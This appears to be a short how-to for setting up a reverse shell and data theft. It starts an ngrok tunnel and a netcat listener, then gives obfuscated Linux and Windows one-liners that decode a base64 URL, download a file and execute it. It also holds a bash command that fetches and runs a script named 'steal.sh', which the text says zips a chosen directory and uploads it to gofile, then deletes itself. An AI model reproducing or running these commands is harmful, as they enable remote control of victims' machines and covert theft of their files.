you will need Python, Netcat, & Ngrok
Get Netcat
Get Ngrok and Set Up
Start Ngrokngrok tcp 4444
Start Netcatnc -lvp 4444
Download and Edit Python File
Convert URL to Base64
{BASE64 GOES HERE}
with the Base64 link:
Linux:
curl -O $(echo "{BASE64 GOES HERE}" | base64 --decode)
Windows:
powershell -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('{BASE64 GOES HERE}'))) -OutFile ([System.IO.Path]::GetFileName(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('{BASE64 GOES HERE}')))))"
chmod +x {FILENAME}
./{FILENAME}
Windows:
start {FILENAME}
bash -c 'curl -o steal.sh $(echo "aHR0cHM6Ly9jYXRsaXR0ZXIubWlub2EuY2F0L2FwaS92aWV3L2FkMGI1MTJhNzZiNTBjODhlY2VmLnNo" | base64 --decode) && chmod +x steal.sh && bash ./steal.sh && rm -- steal.sh'
(downloads and runs this script that zips and uploads whatever dir you enter to gofile and gives you the link only on linux)